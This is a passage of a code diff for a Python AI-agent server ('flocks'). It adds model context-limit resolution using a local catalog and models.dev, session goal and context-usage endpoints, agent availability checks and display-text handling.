+    """Return ``int(value)`` when that yields a positive integer; otherwise (unparseable or <= 0) None."""
+    try:
+        parsed = int(value)
+    except (TypeError, ValueError, OverflowError):  # OverflowError: int(float("inf")), e.g. JSON Infinity
+        return None
+    return parsed if parsed > 0 else None
+
+
+def _extract_limits_from_model(model: Any) -> tuple[Optional[int], Optional[int]]:
+    """Return ``(context_window, max_output_tokens)`` read from a dict or an object; either may be None."""
+    if model is None:
+        return None, None
+
+    if isinstance(model, dict):
+        context = _coerce_positive_int(model.get("context_window"))
+        max_output = _coerce_positive_int(model.get("max_output_tokens"))
+        limits = model.get("limits")
+        if isinstance(limits, dict):  # top-level keys win; the nested "limits" dict only fills gaps
+            context = context or _coerce_positive_int(limits.get("context_window"))
+            max_output = max_output or _coerce_positive_int(
+                limits.get("max_output_tokens")
+            )
+        return context, max_output
+
+    limits = getattr(model, "limits", None)  # object form: read .limits first, then .capabilities
+    context = _coerce_positive_int(getattr(limits, "context_window", None))
+    max_output = _coerce_positive_int(getattr(limits, "max_output_tokens", None))
+
+    capabilities = getattr(model, "capabilities", None)
+    context = context or _coerce_positive_int(
+        getattr(capabilities, "context_window", None)
+    )
+    max_output = max_output or _coerce_positive_int(
+        getattr(capabilities, "max_tokens", None)  # capabilities names this field "max_tokens"
+    )
+    return context, max_output
+
+
+def _merge_missing_limits(
+    context_window: Optional[int],
+    max_output_tokens: Optional[int],
+    candidate_context: Optional[int],
+    candidate_max_output: Optional[int],
+) -> tuple[Optional[int], Optional[int]]:
+    """Return both limits, taking each from the candidate only where the current one is None."""
+    merged_context = candidate_context if context_window is None else context_window
+    merged_output = (
+        candidate_max_output if max_output_tokens is None else max_output_tokens
+    )
+    return merged_context, merged_output
+
+
+def _resolve_catalog_limits(
+    provider_id: str,
+    model_id: str,
+    raw_provider: dict[str, Any],
+) -> tuple[Optional[int], Optional[int]]:
+    """Return limits from the first local source that matches: saved config, model catalog, then runtime."""
+    raw_models = raw_provider.get("models", {})
+    if isinstance(raw_models, dict):
+        context, max_output = _extract_limits_from_model(raw_models.get(model_id))
+        if context is not None or max_output is not None:  # saved config counts only if it yields a limit
+            return context, max_output
+
+    try:
+        from flocks.provider.model_catalog import get_provider_model_definitions
+
+        for model_def in get_provider_model_definitions(provider_id):
+            if model_def.id == model_id:
+                return _extract_limits_from_model(model_def)  # first id match wins, even with no limits
+    except Exception as exc:  # best-effort: log at debug level and fall through to the runtime lookup
+        log.debug("custom_model.catalog_limits_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+
+    try:
+        model = Provider.resolve_model(provider_id, model_id)
+        return _extract_limits_from_model(model)
+    except Exception as exc:  # best-effort: a failed runtime lookup means no local limits
+        log.debug("custom_model.runtime_limits_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+    return None, None
+
+
+def _models_dev_provider_id(provider_id: str, model_id: str = "") -> Optional[str]:
+    """Translate a Flocks provider id (or a ``prefix:`` on the model id) to its models.dev id, else None."""
+    provider_key = provider_id.lower().removeprefix("custom-")
+    alias = _MODELS_DEV_PROVIDER_ALIASES.get(provider_key)
+    if alias is not None:
+        return alias
+    # Otherwise try the part of the model id before its first ":" as the provider key.
+    head, separator, _ = model_id.partition(":")
+    return _MODELS_DEV_PROVIDER_ALIASES.get(head.lower()) if separator else None
+
+
+async def _fetch_models_dev() -> Optional[dict[str, Any]]:
+    """Return the models.dev payload, reusing the in-memory copy while fresh; on failure return the old copy or None."""
+    global _models_dev_cache, _models_dev_cache_time
+    now = time.monotonic()  # taken before the request, so the TTL is measured from the start of the fetch
+    if (
+        _models_dev_cache is not None
+        and now - _models_dev_cache_time < MODELS_DEV_CACHE_TTL_SEC
+    ):
+        return _models_dev_cache
+
+    try:
+        import httpx
+
+        async with httpx.AsyncClient(timeout=MODELS_DEV_TIMEOUT_SEC) as client:
+            response = await client.get(MODELS_DEV_URL)
+            response.raise_for_status()
+            data = response.json()
+    except Exception as exc:  # any import/network/HTTP/JSON error: keep serving whatever was cached
+        log.warning("custom_model.models_dev_fetch_failed", {"error": str(exc)})
+        return _models_dev_cache
+
+    if not isinstance(data, dict):  # the cache is only replaced by a dict payload
+        log.warning("custom_model.models_dev_invalid_payload", {})
+        return _models_dev_cache
+
+    _models_dev_cache = data
+    _models_dev_cache_time = now
+    return data
+
+
+async def _resolve_models_dev_limits(
+    provider_id: str,
+    model_id: str,
+) -> tuple[Optional[int], Optional[int]]:
+    """Look up ``(context, output)`` limits for the model in the models.dev payload; (None, None) if not found."""
+    models_dev_provider = _models_dev_provider_id(provider_id, model_id)
+    if not models_dev_provider:  # unmapped provider: return before any fetch is attempted
+        return None, None
+
+    data = await _fetch_models_dev()
+    if not data:
+        return None, None
+
+    provider_data = data.get(models_dev_provider)
+    if not isinstance(provider_data, dict):
+        return None, None
+    models = provider_data.get("models")
+    if not isinstance(models, dict):
+        return None, None
+
+    model_candidates = [model_id]
+    if ":" in model_id:
+        model_candidates.append(model_id.split(":", 1)[1])  # also try the id without its "prefix:"
+
+    entry = None
+    for model_candidate in model_candidates:
+        entry = models.get(model_candidate)  # exact key match first
+        if isinstance(entry, dict):
+            break
+        model_lower = model_candidate.lower()
+        for candidate_id, candidate in models.items():  # then a case-insensitive scan of all keys
+            if candidate_id.lower() == model_lower and isinstance(candidate, dict):
+                entry = candidate
+                break
+        if isinstance(entry, dict):
+            break
+    if not isinstance(entry, dict):
+        return None, None
+
+    limits = entry.get("limit")  # limits are read from the entry's "limit" dict: "context" and "output"
+    if not isinstance(limits, dict):
+        return None, None
+    return (
+        _coerce_positive_int(limits.get("context")),
+        _coerce_positive_int(limits.get("output")),
+    )
+
+
+async def _resolve_model_limits(
+    provider_id: str,
+    body: CreateModelReq,
+    raw_provider: dict[str, Any],
+) -> ResolvedModelLimits:
+    """Fill missing limits in order: request body, local metadata, models.dev, fallback constants."""
+    context_window = body.context_window
+    max_output_tokens = body.max_output_tokens
+    if context_window is not None and max_output_tokens is not None:  # nothing to resolve
+        return ResolvedModelLimits(context_window, max_output_tokens, "explicit")
+
+    source = "explicit"  # overwritten by each later stage that fills a value, so it names the last one
+    catalog_context, catalog_max_output = _resolve_catalog_limits(
+        provider_id,
+        body.model_id,
+        raw_provider,
+    )
+    before = (context_window, max_output_tokens)
+    context_window, max_output_tokens = _merge_missing_limits(
+        context_window,
+        max_output_tokens,
+        catalog_context,
+        catalog_max_output,
+    )
+    if before != (context_window, max_output_tokens):
+        source = "catalog"
+
+    if context_window is None or max_output_tokens is None:  # models.dev is consulted only if a gap remains
+        models_dev_context, models_dev_max_output = await _resolve_models_dev_limits(
+            provider_id,
+            body.model_id,
+        )
+        before = (context_window, max_output_tokens)
+        context_window, max_output_tokens = _merge_missing_limits(
+            context_window,
+            max_output_tokens,
+            models_dev_context,
+            models_dev_max_output,
+        )
+        if before != (context_window, max_output_tokens):
+            source = "models_dev"
+
+    before = (context_window, max_output_tokens)
+    context_window, max_output_tokens = _merge_missing_limits(
+        context_window,
+        max_output_tokens,
+        FALLBACK_CONTEXT_WINDOW,
+        FALLBACK_MAX_OUTPUT_TOKENS,
+    )
+    if before != (context_window, max_output_tokens):  # e.g. catalog context + fallback output -> "fallback"
+        source = "fallback"
+
+    return ResolvedModelLimits(
+        context_window=context_window or FALLBACK_CONTEXT_WINDOW,
+        max_output_tokens=max_output_tokens or FALLBACK_MAX_OUTPUT_TOKENS,
+        source=source,
+    )
+
+
 def _register_provider(
     pid: str, name: str, base_url: str, api_key: Optional[str] = None
 ):
@@ -298,7 +604,13 @@ def _register_provider(
     Provider.register(p)
 
 
-def _add_model_to_runtime(provider_id: str, body: CreateModelReq):
+def _add_model_to_runtime(
+    provider_id: str,
+    body: CreateModelReq,
+    *,
+    context_window: Optional[int] = None,
+    max_output_tokens: Optional[int] = None,
+):
     """Add (or upsert) a model in the runtime Provider registry.
 
     Works for both CustomProvider (_custom_models) and DynamicOpenAIProvider
@@ -320,8 +632,16 @@ def _add_model_to_runtime(provider_id: str, body: CreateModelReq):
             supports_tools=body.supports_tools,
             supports_vision=body.supports_vision,
             supports_reasoning=body.supports_reasoning,
-            max_tokens=body.max_output_tokens,
-            context_window=body.context_window,
+            max_tokens=(
+                max_output_tokens
+                or body.max_output_tokens
+                or FALLBACK_MAX_OUTPUT_TOKENS
+            ),
+            context_window=(
+                context_window
+                or body.context_window
+                or FALLBACK_CONTEXT_WINDOW
+            ),
         ),
         pricing=_pricing,
     )
diff --git a/flocks/server/routes/device.py b/flocks/server/routes/device.py
index 3fbbae766..650a13b72 100644
--- a/flocks/server/routes/device.py
+++ b/flocks/server/routes/device.py
@@ -5,6 +5,7 @@
 """
 from __future__ import annotations
 
+import json
 from typing import Any, List, Optional
 
 import aiosqlite
@@ -40,10 +41,11 @@
     create_custom_device_template,
     list_device_templates,
 )
+from flocks.tool.device.secrets import resolve_for_runtime
 from flocks.tool.device.store import (
     create_group,
-    delete_device_tool_setting,
     delete_group,
+    delete_device_tool_setting,
     fetch_device,
     get_group,
     list_device_tool_settings,
@@ -174,7 +176,6 @@ async def route_delete_group(group_id: str):
 
 @router.get("", response_model=List[DeviceIntegration])
 async def route_list_devices(group_id: Optional[str] = None, refresh: bool = False):
-    await ensure_user_device_instances(refresh_templates=refresh)
     return await list_devices(group_id)
 
 
@@ -183,6 +184,13 @@ async def route_list_device_templates(refresh: bool = False):
     return list_device_templates(refresh=refresh)
 
 
+@router.post("/sync")
+async def route_sync_devices(refresh: bool = True):
+    """Synchronize device instances from installed user-level templates; responds with the helper's result under "created"."""
+    created = await ensure_user_device_instances(refresh_templates=refresh)
+    return {"created": created}
+
+
 @router.post(
     "/templates/custom",
     response_model=DeviceTemplate,
@@ -317,7 +325,7 @@ async def route_list_device_tools(device_id: str):
     """列出设备对应插件的所有工具，并附带该设备的独立开关状态。
 
     返回的 ``enabled_effective`` 字段反映实际执行时的生效状态：
-    - 若存在 per-device 覆盖（enabled_device 非 null），以它为准；
+    - 若存在 per-device 禁用覆盖（enabled_device=false），以它为准；
     - 否则沿用全局 tool_settings（enabled_global）。
     """
     row = await fetch_device(device_id)
@@ -342,7 +350,8 @@ async def route_list_device_tools(device_id: str):
 
     result: List[DeviceToolInfo] = []
     for t in device_tools:
-        enabled_device: Optional[bool] = per_device.get(t.name)
+        raw_enabled_device: Optional[bool] = per_device.get(t.name)
+        enabled_device: Optional[bool] = False if raw_enabled_device is False else None
 
         enabled_global = t.enabled
         enabled_effective = (
@@ -366,10 +375,10 @@ async def route_list_device_tools(device_id: str):
 async def route_update_device_tool(
     device_id: str, tool_name: str, body: DeviceToolUpdateRequest
 ):
-    """设置或清除某工具在指定设备上的独立开关。
+    """设置某工具在指定设备上的独立开关。
 
     - ``enabled=false`` → 仅在该设备上禁用工具，不影响同版本其他设备；
-    - ``enabled=true``  → 移除 per-device 覆盖，恢复遵从全局工具开关。
+    - ``enabled=true``  → 清除该设备禁用覆盖并跟随全局；若全局禁用则先启用全局工具。
     """
     row = await fetch_device(device_id)
     if row is None:
@@ -389,7 +398,10 @@ async def route_update_device_tool(
         )
 
     if body.enabled:
-        # Removing the override restores global behaviour.
+        if not tool.info.enabled:
+            from flocks.server.routes.tool import _set_global_tool_enabled
+
+            _set_global_tool_enabled(tool, True)
         await delete_device_tool_setting(device_id, tool_name)
         enabled_device = None
     else:
diff --git a/flocks/server/routes/health.py b/flocks/server/routes/health.py
index ed7c8f64e..f2539d038 100644
--- a/flocks/server/routes/health.py
+++ b/flocks/server/routes/health.py
@@ -19,15 +19,6 @@ class HealthResponse(BaseModel):
     timestamp: str
     config_dir: str
     data_dir: str
-    task_manager_started: bool
-    task_scheduler_running: bool
-    task_scheduler_available: bool
-    task_manager_error: str | None = None
-    task_queue_paused: bool = False
-    task_queue_running: int = 0
-    task_queue_queued: int = 0
-    task_stale_running: int = 0
-    task_oldest_running_seconds: int | None = None
 
 
 @router.get(
@@ -45,9 +36,6 @@ async def health_check() -> HealthResponse:
     """
     from datetime import UTC
     config = Config.get_global()
-    from flocks.task.manager import TaskManager
-    task_status = TaskManager.runtime_status()
-    queue_status = await TaskManager.queue_status()
     
     from flocks.updater import get_current_version
     return HealthResponse(
@@ -56,12 +44,6 @@ async def health_check() -> HealthResponse:
         timestamp=datetime.now(UTC).isoformat(),
         config_dir=str(config.config_dir),
         data_dir=str(config.data_dir),
-        **task_status,
-        task_queue_paused=queue_status["paused"],
-        task_queue_running=queue_status["running"],
-        task_queue_queued=queue_status["queued"],
-        task_stale_running=queue_status["stale_running"],
-        task_oldest_running_seconds=queue_status["oldest_running_seconds"],
     )
 
 
diff --git a/flocks/server/routes/session.py b/flocks/server/routes/session.py
index a8684521d..68b15a082 100644
--- a/flocks/server/routes/session.py
+++ b/flocks/server/routes/session.py
@@ -18,6 +18,11 @@
 from flocks.server.routes._timing import log_route_timing
 from flocks.audit import emit_audit_event
 from flocks.license import assert_license_active
+from flocks.session.context_usage import (
+    ContextUsageSnapshot,
+    build_context_usage_snapshot,
+    token_usage_to_dict,
+)
 from flocks.session.session import Session, SessionInfo as SessionModel
 from flocks.session.policy import SessionPolicy
 from flocks.utils.log import Log
@@ -91,6 +96,15 @@ class SessionTime(BaseModel):
     archived: Optional[int] = Field(None, description="Archive timestamp (ms)")
 
 
+class SessionGoalResponse(BaseModel):
+    """Persisted goal state shown by the WebUI composer banner."""
+    model_config = ConfigDict(populate_by_name=True)  # NOTE(review): no field below declares an alias — confirm this is needed
+
+    status: Literal["active", "paused", "completed", "blocked"] = Field(..., description="Goal status")
+    objective: str = Field(..., description="Goal objective")
+    reason: Optional[str] = Field(None, description="Last goal judge reason")  # filled from last_reason, else paused_reason
+
+
 class SessionResponse(BaseModel):
     """
     Session response - Flocks compatible
@@ -119,6 +133,7 @@ class SessionResponse(BaseModel):
     canWrite: bool = Field(False, description="Whether current user can continue this session")
     canDelete: bool = Field(False, description="Whether current user can delete this session")
     isShared: bool = Field(False, description="Whether this session is locally shared")
+    goal: Optional[SessionGoalResponse] = Field(None, description="Persisted session goal state")
 
 
 def _session_to_response(session: SessionModel) -> SessionResponse:
@@ -159,6 +174,26 @@ def _session_to_response(session: SessionModel) -> SessionResponse:
     )
 
 
+async def _session_to_response_with_goal(session: SessionModel) -> SessionResponse:
+    """Build the SessionResponse and attach the session's goal when one is found; lookup errors leave ``goal`` unset."""
+    response = _session_to_response(session)
+    try:
+        from flocks.session.goal import GoalManager
+
+        goal_state = await GoalManager.get(session.id)
+    except Exception as exc:  # best-effort: a goal lookup failure must not fail the session response
+        log.warn("session.goal.response_error", {"sessionID": session.id, "error": str(exc)})
+        goal_state = None
+
+    if goal_state is not None:
+        response.goal = SessionGoalResponse(
+            status=goal_state.status,
+            objective=goal_state.objective,
+            reason=goal_state.last_reason or goal_state.paused_reason,  # paused_reason only when last_reason is falsy
+        )
+    return response
+
+
 def _require_session_read_access(session: SessionModel, user) -> None:
     if not SessionPolicy.can_read(session, user):
         raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="仅会话所有者或受邀只读用户可访问会话")
@@ -169,6 +204,39 @@ def _require_session_write_access(session: SessionModel, user) -> None:
         raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="仅会话所有者可写，受邀用户为只读")
 
 
+async def _require_agent_usable_for_chat(agent_name: Optional[str]) -> None:
+    """Validate an explicitly requested chat agent; raise HTTP 400 if it cannot be used.
+
+    A falsy ``agent_name`` is accepted without any lookup. The Agent page "enabled"
+    toggle is stored as ``delegatable`` for backward compatibility, but product
+    semantics treat disabled subagents as unusable for delegation and direct chat.
+    """
+    if not agent_name:
+        return
+
+    from flocks.agent.registry import Agent
+
+    agent = await Agent.get(agent_name)
+    if agent is None:  # unknown agent name
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is not available',
+        )
+
+    tags = getattr(agent, "tags", None) or []
+    if getattr(agent, "hidden", False) or "system" in tags:  # hidden or system-tagged agents are rejected
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is not available for chat',
+        )
+
+    if getattr(agent, "mode", None) != "primary" and getattr(agent, "delegatable", True) is False:  # primary agents skip this check
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is disabled',
+        )
+
+
 def _is_hidden_from_session_manager(session: SessionModel) -> bool:
     """Return whether a session should be excluded from manager listings."""
     metadata = session.metadata if isinstance(session.metadata, dict) else {}
@@ -196,6 +264,37 @@ async def _get_session_by_id_unfiltered(session_id: str) -> Optional[SessionMode
         reset_current_auth_user(token)
 
 
+async def _publish_context_usage_update(
+    event_publish_callback,
+    session_id: str,
+    *,
+    session: Optional[SessionModel] = None,
+    provider_id: Optional[str] = None,
+    model_id: Optional[str] = None,
+) -> None:
+    """Best-effort SSE update for the composer context-usage meter."""
+    if event_publish_callback is None:  # no publisher supplied: nothing to do
+        return
+    try:
+        if session is None:  # load the session only when the caller did not pass one
+            session = await _get_session_by_id_unfiltered(session_id)
+        snapshot = await build_context_usage_snapshot(
+            session_id,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+        await event_publish_callback(
+            "context.usage.updated",
+            snapshot.model_dump(by_alias=True),
+        )
+    except Exception as exc:  # never propagate: failures are only logged at debug level
+        log.debug("session.context_usage.publish_failed", {
+            "sessionID": session_id,
+            "error": str(exc),
+        })
+
+
 # =============================================================================
 # Session CRUD Routes
 # =============================================================================
@@ -277,7 +376,7 @@ async def list_sessions(
         if limit is not None and len(filtered) >= limit:
             break
     
-    response = [_session_to_response(s) for s in filtered]
+    response = [await _session_to_response_with_goal(s) for s in filtered]
     log_route_timing(log, "session.list.complete", started_at=started_at, extra={
         "count": len(response),
         "roots": roots,
@@ -382,7 +481,7 @@ async def create_session(http_request: Request, request: Optional[SessionCreateR
         )
     except Exception:
         pass
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 
@@ -404,7 +503,26 @@ async def get_session(sessionID: str, request: Request) -> SessionResponse:
             detail=f"Session {sessionID} not found"
         )
     _require_session_read_access(session, _current_user)
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
+
+
+@router.get(
+    "/{sessionID}/context-usage",
+    response_model=ContextUsageSnapshot,
+    summary="Get session context usage",
+    description="Get the current context usage snapshot for the composer meter",
+)
+async def get_session_context_usage(sessionID: str, request: Request) -> ContextUsageSnapshot:
+    """Return the context usage snapshot for a session; 404 if the session is missing, read access is checked first."""
+    current_user = require_user(request)
+    session = await _get_session_by_id_unfiltered(sessionID)
+    if not session:
+        raise HTTPException(
+            status_code=status.HTTP_404_NOT_FOUND,
+            detail=f"Session {sessionID} not found",
+        )
+    _require_session_read_access(session, current_user)  # raises HTTP 403 when the user may not read it
+    return await build_context_usage_snapshot(sessionID, session=session)
 
 
 @router.get(
@@ -424,7 +542,7 @@ async def get_session_children(sessionID: str, request: Request) -> List[Session
         )
     _require_session_read_access(session, current_user)
     children = await Session.children(session.project_id, sessionID)
-    return [_session_to_response(s) for s in children if SessionPolicy.can_read(s, current_user)]
+    return [await _session_to_response_with_goal(s) for s in children if SessionPolicy.can_read(s, current_user)]
 
 
 class TodoInfo(BaseModel):
@@ -615,7 +733,7 @@ async def update_session(
         )
     
     log.info("session.updated", {"session_id": sessionID})
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 @router.post(
@@ -648,7 +766,7 @@ async def share_session_local(sessionID: str, http_request: Request) -> SessionR
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 @router.post(
@@ -681,7 +799,7 @@ async def unshare_session_local(sessionID: str, http_request: Request) -> Sessio
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 # =============================================================================
@@ -831,7 +949,7 @@ async def fork_session(sessionID: str, http_request: Request, request: Optional[
     forked = await Session.fork(session.project_id, sessionID, message_id)
     
     log.info("session.forked", {"from": sessionID, "to": forked.id})
-    return _session_to_response(forked)
+    return await _session_to_response_with_goal(forked)
 
 
 @router.get(
@@ -969,7 +1087,7 @@ async def revert_session(sessionID: str, request: RevertRequest, http_request: R
     )
     
     log.info("session.reverted", {"session_id": sessionID, "message_id": request.messageID})
-    return _session_to_response(updated)
+    return await _session_to_response_with_goal(updated)
 
 
 @router.post(
@@ -994,7 +1112,7 @@ async def unrevert_session(sessionID: str, http_request: Request) -> SessionResp
     updated = await SessionRevert.unrevert(session_id=sessionID)
     
     log.info("session.unreverted", {"session_id": sessionID})
-    return _session_to_response(updated)
+    return await _session_to_response_with_goal(updated)
 
 
 # =============================================================================
@@ -1051,6 +1169,7 @@ class PromptRequest(BaseModel):
     model: Optional[ModelInfo] = Field(None, description="Model selection")
     messageID: Optional[str] = Field(None, description="Message ID")
     agent: Optional[str] = Field(None, description="Agent name")
+    display_text: Optional[str] = Field(None, alias="displayText", description="User-visible message text")
     noReply: Optional[bool] = Field(None, description="Skip AI response")
     mockReply: Optional[str] = Field(None, description="Inject a mock assistant message after noReply user message")
     tools: Optional[Dict[str, bool]] = Field(None, description="Tool settings (deprecated)")
@@ -1692,10 +1811,12 @@ async def _on_error(error: str):
     final_content = ""
     assistant_message_id = None
     created_ms = end_ms
+    final_tokens = {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
 
     if result.last_message:
         assistant_message_id = result.last_message.id
         final_content = await Message.get_text_content(result.last_message)
+        final_tokens = token_usage_to_dict(getattr(result.last_message, "tokens", None))
         finish = getattr(result.last_message, "finish", None)
         if finish:
             finish_reason = finish
@@ -1724,10 +1845,17 @@ async def _on_error(error: str):
             "agent": agent_name,
             "path": {"cwd": working_directory, "root": working_directory},
             "cost": 0,
-            "tokens": {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}},
+            "tokens": final_tokens,
             "finish": finish_reason,
         }
     })
+    await _publish_context_usage_update(
+        publish_event,
+        session_id,
+        session=session,
+        provider_id=provider_id,
+        model_id=model_id,
+    )
 
     log.info("session.message.replay.completed", {
         "sessionID": session_id,
@@ -2191,27 +2319,42 @@ async def progress_callback(stage: str, data: dict) -> None:
                 "data": data,
             })
 
-    result = await run_compaction(
-        session_id,
-        parent_message_id=parent_message_id,
-        messages=messages,
-        provider_id=provider_id,
-        model_id=model_id,
-        auto=auto,
-        event_publish_callback=event_publish_callback,
-        status_after="idle",
-        focus_instruction=focus_instruction,
-        progress_callback=progress_callback,
-    )
+    async def publish_current_context_usage() -> None:
+        await _publish_context_usage_update(
+            event_publish_callback,
+            session_id,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+
+    try:
+        result = await run_compaction(
+            session_id,
+            parent_message_id=parent_message_id,
+            messages=messages,
+            provider_id=provider_id,
+            model_id=model_id,
+            auto=auto,
+            event_publish_callback=event_publish_callback,
+            status_after="idle",
+            focus_instruction=focus_instruction,
+            progress_callback=progress_callback,
+        )
+    except Exception:
+        await publish_current_context_usage()
+        raise
     if result == "stop":
         # ``SessionCompaction.process`` swallows the underlying provider
         # exception (so the loop path stays simple) but stashes the
         # user-facing message via ``_record_compaction_error``.  Surface
         # it verbatim here so the SSE ``session.error`` payload — and
-        # therefore the front-end toast — shows e.g. "Error code: 529
-        # — 模型服务暂时不可用" instead of an opaque "Compaction failed".
+        # therefore the front-end toast — shows the provider's original
+        # error text instead of an opaque "Compaction failed".
+        await publish_current_context_usage()
         detail = pop_last_compaction_error(session_id) or "Compaction failed"
         raise RuntimeError(detail)
+    await publish_current_context_usage()
     return agent_name, provider_id, model_id
 
 
@@ -2222,16 +2365,16 @@ async def progress_callback(stage: str, data: dict) -> None:
 
 def _check_session_aborted(sessionID: str, checkpoint: str, step: int, **extra_context) -> bool:
     """
-    检查 session 是否被 abort
+    Check whether the session has been aborted.
     
     Args:
         sessionID: Session ID
-        checkpoint: 检查点名称（如 "before_step", "in_stream", "skip_tool_processing"）
-        step: 当前 step 数
-        **extra_context: 额外的日志上下文信息
+        checkpoint: Checkpoint name, such as "before_step", "in_stream", or "skip_tool_processing".
+        step: Current step number.
+        **extra_context: Additional log context.
     
     Returns:
-        True 表示 session 已被 abort，应该停止执行
+        True when the session has been aborted and execution should stop.
     """
     from flocks.session.core.status import SessionStatus
     
@@ -2302,6 +2445,7 @@ async def _process_session_message(
     # ------------------------------------------------------------------
     # 2. Resolve agent and model (5-level priority)
     # ------------------------------------------------------------------
+    await _require_agent_usable_for_chat(request.agent)
     agent_name = request.agent or await Agent.default_agent()
     agent = await Agent.get(agent_name) or await Agent.get(DEFAULT_AGENT)
     
@@ -2350,22 +2494,23 @@ async def _process_session_message(
     user_message_id = request.messageID or Identifier.create("message")
     user_part_id = Identifier.create("part")
 
-    # display_text (optional) is the user-visible text shown in the chat bubble.
-    # It differs from text_content when a command generates a derived LLM prompt
-    # (e.g. "/tools create foo" stores the slash command text, not the full skill
-    # prompt that is sent to the LLM).
-    display_text = getattr(request, "display_text", None) or text_content
+    # display_text (optional) is UI-only. The stored text part must stay as the
+    # real prompt so SessionLoop, hooks, title generation, and queued prompts keep
+    # seeing the same content the model receives.
+    display_text = getattr(request, "display_text", None)
+    display_metadata = {"displayText": display_text} if display_text else None
 
     _is_no_reply = bool(request.noReply)
     user_message = await Message.create(
         session_id=sessionID,
         role=MessageRole.USER,
-        content=display_text,
+        content=text_content,
         id=user_message_id,
         time={"created": now_ms},
         agent=agent_name,
         model={"providerID": provider_id, "modelID": model_id},
         part_id=user_part_id,
+        part_metadata=display_metadata,
         synthetic=True if _is_no_reply else None,
     )
     user_message_id = user_message.id
@@ -2385,9 +2530,11 @@ async def _process_session_message(
         "messageID": user_message_id,
         "sessionID": sessionID,
         "type": "text",
-        "text": display_text,
+        "text": text_content,
         "time": {"start": now_ms},
     }
+    if display_metadata:
+        _part_event["metadata"] = display_metadata
     if _is_no_reply:
         _part_event["synthetic"] = True
     await publish_event("message.part.updated", {"part": _part_event})
@@ -2443,7 +2590,7 @@ def _materialize_data_url_to_disk(
             unique_name = f"{Identifier.create('part')}{ext}"
             target = uploads_root / unique_name
             target.write_bytes(raw_bytes)
-            return f"file://{target.resolve()}"
+            return target.resolve().as_uri()
         except Exception as exc:
             log.warn("session.message.file_part.materialize_failed", {
                 "sessionID": sessionID,
@@ -2533,6 +2680,14 @@ def _materialize_data_url_to_disk(
                 },
             })
 
+        await _publish_context_usage_update(
+            publish_event,
+            sessionID,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+
         return {
             "id": user_message_id,
             "sessionID": sessionID,
@@ -2589,10 +2744,12 @@ async def _on_error(error: str):
     finish_reason = "stop"
     final_content = ""
     assistant_message_id = None
+    final_tokens = {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
     
     if result.last_message:
         assistant_message_id = result.last_message.id
         final_content = await Message.get_text_content(result.last_message)
+        final_tokens = token_usage_to_dict(getattr(result.last_message, "tokens", None))
         finish = getattr(result.last_message, 'finish', None)
         if finish:
             finish_reason = finish
@@ -2619,10 +2776,17 @@ async def _on_error(error: str):
             "agent": agent_name,
             "path": {"cwd": working_directory, "root": working_directory},
             "cost": 0,
-            "tokens": {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}},
+            "tokens": final_tokens,
             "finish": finish_reason,
         }
     })
+    await _publish_context_usage_update(
+        publish_event,
+        sessionID,
+        session=session,
+        provider_id=provider_id,
+        model_id=model_id,
+    )
     
     # Collect parts for the response
     all_parts = []
@@ -2803,13 +2967,21 @@ def _extract_text_from_parts(parts: List[Dict[str, Any]]) -> str:
     return "".join(part.get("text", "") for part in parts if part.get("type") == "text")
 
 
-def _replace_text_parts(parts: Optional[List[Dict[str, Any]]], text: str) -> List[Dict[str, Any]]:
+def _replace_text_parts(
+    parts: Optional[List[Dict[str, Any]]],
+    text: str,
+    text_metadata: Optional[Dict[str, Any]] = None,
+) -> List[Dict[str, Any]]:
     updated_parts: List[Dict[str, Any]] = []
     replaced = False
     for part in parts or []:
         if part.get("type") == "text" and not replaced:
             next_part = dict(part)
             next_part["text"] = text
+            if text_metadata:
+                merged_metadata = dict(next_part.get("metadata") or {})
+                merged_metadata.update(text_metadata)
+                next_part["metadata"] = merged_metadata
             updated_parts.append(next_part)
             replaced = True
             continue
@@ -2818,7 +2990,10 @@ def _replace_text_parts(parts: Optional[List[Dict[str, Any]]], text: str) -> Lis
         updated_parts.append(dict(part))
 
     if not replaced:
-        updated_parts.insert(0, {"type": "text", "text": text})
+        next_part: Dict[str, Any] = {"type": "text", "text": text}
+        if text_metadata:
+            next_part["metadata"] = dict(text_metadata)
+        updated_parts.insert(0, next_part)
     return updated_parts
 
 
@@ -2926,7 +3101,7 @@ def _materialize_data_url_part(
                 ext = "." + tail.lower()
         target = uploads_root / f"{Identifier.create('part')}{ext}"
         target.write_bytes(raw_bytes)
-        return f"file://{target.resolve()}"
+        return target.resolve().as_uri()
     except Exception as exc:
         log.warn("session.prompt_queue.materialize_failed", {
             "sessionID": session_id,
@@ -2946,7 +3121,7 @@ def _event_from_queued_prompt(item, working_directory: str):
         agent=item.agent,
         model=item.model,
         variant=item.variant,
-        display_text=None,
+        display_text=item.display_text,
         messageID=item.messageID,
         noReply=item.noReply,
         mockReply=item.mockReply,
@@ -3059,7 +3234,7 @@ def _build_prompt_request_from_event(event, prompt_text: str, display_text: Opti
     import types
 
     return types.SimpleNamespace(
-        parts=_replace_text_parts(event.parts, prompt_text),
